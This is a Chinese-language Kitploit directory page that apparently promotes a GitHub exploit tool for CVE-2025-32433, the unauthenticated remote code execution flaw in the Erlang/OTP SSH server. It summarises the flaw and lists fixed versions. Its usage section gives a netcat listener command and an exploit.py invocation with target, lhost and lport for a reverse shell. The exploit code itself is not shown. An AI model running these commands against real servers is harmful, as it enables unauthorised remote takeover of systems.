Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32433 — CVE-2025-32433 摘要与攻击概述 | Kitploit
工具/GitHubGitHub/mrdreamreal/cve-2025-32433
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 摘要与攻击概述

查看仓库
251年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32433

CVE-2025-32433 摘要与攻击概述

CVE-2025-32433 是 Erlang/OTP SSH 服务器中的一个严重的未认证远程代码执行(RCE)漏洞,于 2025 年 4 月 16 日披露。Erlang/OTP SSH 是一个用于各种分布式和电信应用程序的库。该缺陷源于对 SSH 协议消息的处理不当:服务器未能强制执行正常的认证序列,从而允许攻击者在认证之前发送特制的 SSH 消息。如此一来,攻击者便可在服务器上注入并执行任意 Erlang 代码​ nvd.nist.gov ​ offsec.com . 实际上,这意味着,能够访问易受攻击的 Erlang/OTP SSH 服务器(通常以 root 身份运行)的攻击者,无需任何凭据即可触发反向 shell 或执行命令,从而导致系统完全失陷​ nvd.nist.gov ​ offsec.com . 该漏洞的 CVSS 评分为 10.0(最高严重性)​ offsec.com .

受影响版本为 OTP-27.3.3、OTP-26.2.5.11 或 OTP-25.3.2.20 以下的所有 Erlang/OTP 版本(这些是已修复版本)​ nvd.nist.gov ​ offsec.com . 受影响系统通常包括运行基于 Erlang 的 SSH 守护进程(不要与 OpenSSH 混淆)的 Linux 服务器或设备。重要的是,Linux/BSD 上的默认 OpenSSH 服务器不受影响​ offsec.com . 用户应假设任何暴露的 Erlang/OTP SSH 服务器都受到影响,并立即应用官方补丁或禁用 SSH 服务。

该攻击的工作原理是:先发起一个 SSH 连接,然后按乱序发送一系列 SSH 消息。 :

用法:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

示例:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

下载工具